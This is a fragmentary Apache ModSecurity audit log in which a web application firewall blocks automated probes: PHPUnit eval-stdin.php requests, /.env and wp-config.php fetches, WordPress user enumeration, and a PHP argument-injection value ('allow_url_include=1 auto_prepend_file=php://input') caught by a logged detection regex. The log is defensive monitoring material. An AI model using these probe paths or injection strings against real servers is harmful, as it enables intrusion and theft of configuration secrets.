[uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746980674408146 753 (- - -) Stopwatch2: 1746980674408146 753; combined=322, p1=285, p2=0, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d31ae7f-Z-- --93484034-A-- [12/May/2025:00:22:21 +0700] aCDczU8xOExV7lPH_DmWxQAAAMU 103.236.140.4 47912 103.236.140.4 8181 --93484034-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 208.76.40.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.76.40.194 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --93484034-C-- --93484034-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93484034-E-- --93484034-H-- Message: Access denied with code 403 (phase 2). String match " --bcb3222c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcb3222c-E-- --bcb3222c-H-- Message: Access denied with code 403 (phase 2). String match " --0fc59d57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fc59d57-E-- --0fc59d57-H-- Message: Access denied with code 403 (phase 2). String match " --81474f2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81474f2f-H-- Message: Access denied with code 403 (phase 2). String match " --989f8716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --989f8716-E-- --989f8716-H-- Message: Access denied with code 403 (phase 2). String match " --2ab61b48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ab61b48-E-- --2ab61b48-H-- Message: Access denied with code 403 (phase 2). 
String match " --40d1bb1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40d1bb1c-H-- Message: Access denied with code 403 (phase 2). String match " --18adb35c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18adb35c-E-- --18adb35c-H-- Message: Access denied with code 403 (phase 2). String match " --9185033d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9185033d-E-- --9185033d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746994930790873 5118 (- - -) Stopwatch2: 1746994930790873 5118; combined=3322, p1=545, p2=2742, p3=0, p4=0, p5=34, sr=80, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9185033d-Z-- --39a6115e-A-- [12/May/2025:03:22:40 +0700] aCEHEE8xOExV7lPH_DmYjQAAAMk 103.236.140.4 55654 103.236.140.4 8181 --39a6115e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Mi A1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --39a6115e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39a6115e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746994960059101 12840 (- - -) Stopwatch2: 1746994960059101 12840; combined=24576, p1=248, p2=0, p3=0, p4=0, p5=12180, sr=89, sw=0, l=0, gc=12148 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39a6115e-Z-- --c4c2856d-A-- [12/May/2025:03:27:53 +0700] aCEISUEuxCpmyy5aJPnewwAAAAA 103.236.140.4 55778 103.236.140.4 8181 --c4c2856d-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 208.76.40.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.76.40.194 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --c4c2856d-C-- --c4c2856d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4c2856d-E-- --c4c2856d-H-- Message: Access denied with code 403 (phase 2). String match " --bfac4240-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfac4240-E-- --bfac4240-H-- Message: Access denied with code 403 (phase 2). String match " --ccd3f169-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ccd3f169-E-- --ccd3f169-H-- Message: Access denied with code 403 (phase 2). String match " --c7d22e37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7d22e37-H-- Message: Access denied with code 403 (phase 2). String match " --ebc06a45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebc06a45-E-- --ebc06a45-H-- Message: Access denied with code 403 (phase 2). String match " --022e2450-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --022e2450-E-- --022e2450-H-- Message: Access denied with code 403 (phase 2). 
String match " --63a68709-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63a68709-H-- Message: Access denied with code 403 (phase 2). String match " --7677290a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7677290a-E-- --7677290a-H-- Message: Access denied with code 403 (phase 2). String match " --d25b2d06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d25b2d06-E-- --d25b2d06-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747011786754097 5017 (- - -) Stopwatch2: 1747011786754097 5017; combined=3189, p1=596, p2=2553, p3=0, p4=0, p5=40, sr=154, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d25b2d06-Z-- --71417524-A-- [12/May/2025:08:13:23 +0700] aCFLM34i-S7TW27OkGl82wAAAM0 103.236.140.4 47488 103.236.140.4 8181 --71417524-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 179.109.80.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 179.109.80.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --71417524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71417524-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747012403454811 2908 (- - -) Stopwatch2: 1747012403454811 2908; combined=1263, p1=459, p2=775, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71417524-Z-- --15df8b22-A-- [12/May/2025:08:26:59 +0700] aCFOYxLjIumP119c9poHmwAAABg 103.236.140.4 47570 103.236.140.4 8181 --15df8b22-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.142.108.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.142.108.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --15df8b22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15df8b22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747013219587174 3412 (- - -) Stopwatch2: 1747013219587174 3412; combined=1442, p1=468, p2=944, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15df8b22-Z-- --164ddb4d-A-- [12/May/2025:08:46:49 +0700] aCFTCell0ld2l7Li0sdFOwAAAIc 103.236.140.4 47754 103.236.140.4 8181 --164ddb4d-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 157.245.155.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 157.245.155.158 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force --164ddb4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --164ddb4d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747014409756488 909 (- - -) Stopwatch2: 1747014409756488 909; combined=329, p1=291, p2=0, p3=0, p4=0, p5=37, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --164ddb4d-Z-- --89a6166e-A-- [12/May/2025:08:54:57 +0700] aCFU8X4i-S7TW27OkGl9EwAAANI 103.236.140.4 47918 103.236.140.4 8181 --89a6166e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.191.149.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.191.149.249 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --89a6166e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89a6166e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747014897886786 2790 (- - -) Stopwatch2: 1747014897886786 2790; combined=1209, p1=419, p2=761, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89a6166e-Z-- --ad0e044c-A-- [12/May/2025:09:46:51 +0700] aCFhGxLjIumP119c9poH7AAAABY 103.236.140.4 48908 103.236.140.4 8181 --ad0e044c-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.189.19.19 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.189.19.19 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ad0e044c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad0e044c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747018011408244 765 (- - -) Stopwatch2: 1747018011408244 765; combined=292, p1=249, p2=0, p3=0, p4=0, p5=43, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad0e044c-Z-- --a1825b7c-A-- [12/May/2025:10:01:44 +0700] aCFkmOll0ld2l7Li0sdFmwAAAJQ 103.236.140.4 49024 103.236.140.4 8181 --a1825b7c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.163.15.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.163.15.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a1825b7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1825b7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747018904465309 3231 (- - -) Stopwatch2: 1747018904465309 3231; combined=1398, p1=459, p2=906, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1825b7c-Z-- --1ebd8030-A-- [12/May/2025:10:24:36 +0700] aCFp9H4i-S7TW27OkGl-PwAAANg 103.236.140.4 49116 103.236.140.4 8181 --1ebd8030-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 68.183.9.16 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 68.183.9.16 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --1ebd8030-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ebd8030-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747020276562577 798 (- - -) Stopwatch2: 1747020276562577 798; combined=333, p1=300, p2=0, p3=0, p4=0, p5=33, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ebd8030-Z-- --f551951b-A-- [12/May/2025:10:57:59 +0700] aCFxx34i-S7TW27OkGl_xAAAAMI 103.236.140.4 50742 103.236.140.4 8181 --f551951b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.75.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.75.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1 Accept-Charset: utf-8 --f551951b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f551951b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747022279911719 870 (- - -) Stopwatch2: 1747022279911719 870; combined=392, p1=284, p2=0, p3=0, p4=0, p5=108, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f551951b-Z-- --1d4a0176-A-- [12/May/2025:10:58:22 +0700] aCFx3hKpX3ymKhxxBshFUAAAAE8 103.236.140.4 50744 103.236.140.4 8181 --1d4a0176-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.75.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.75.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/2.0 (compatible; Ask Jeeves/Teoma) Accept-Charset: utf-8 --1d4a0176-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d4a0176-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747022302731234 871 (- - -) Stopwatch2: 1747022302731234 871; combined=375, p1=334, p2=0, p3=0, p4=0, p5=41, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d4a0176-Z-- --b7c90e24-A-- [12/May/2025:11:06:56 +0700] aCFz4H4i-S7TW27OkGmAgAAAAM8 103.236.140.4 52480 103.236.140.4 8181 --b7c90e24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.156.92.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.156.92.159 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --b7c90e24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7c90e24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747022816380052 717 (- - -) Stopwatch2: 1747022816380052 717; combined=321, p1=280, p2=0, p3=0, p4=0, p5=41, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7c90e24-Z-- --7480f11f-A-- [12/May/2025:11:06:57 +0700] aCFz4RKpX3ymKhxxBshFVwAAAFg 103.236.140.4 52486 103.236.140.4 8181 --7480f11f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.156.92.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.156.92.159 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --7480f11f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7480f11f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747022817106539 830 (- - -) Stopwatch2: 1747022817106539 830; combined=389, p1=351, p2=0, p3=0, p4=0, p5=38, sr=155, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7480f11f-Z-- --f0210305-A-- [12/May/2025:11:15:36 +0700] aCF16H4i-S7TW27OkGmArQAAAM8 103.236.140.4 53716 103.236.140.4 8181 --f0210305-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.206.190.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.206.190.67 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f0210305-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0210305-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747023336583845 3207 (- - -) Stopwatch2: 1747023336583845 3207; combined=1412, p1=473, p2=908, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0210305-Z-- --a3f7eb3c-A-- [12/May/2025:11:22:18 +0700] aCF3eull0ld2l7Li0sdFqQAAAJY 103.236.140.4 53730 103.236.140.4 8181 --a3f7eb3c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.89.74.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.89.74.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a3f7eb3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3f7eb3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] 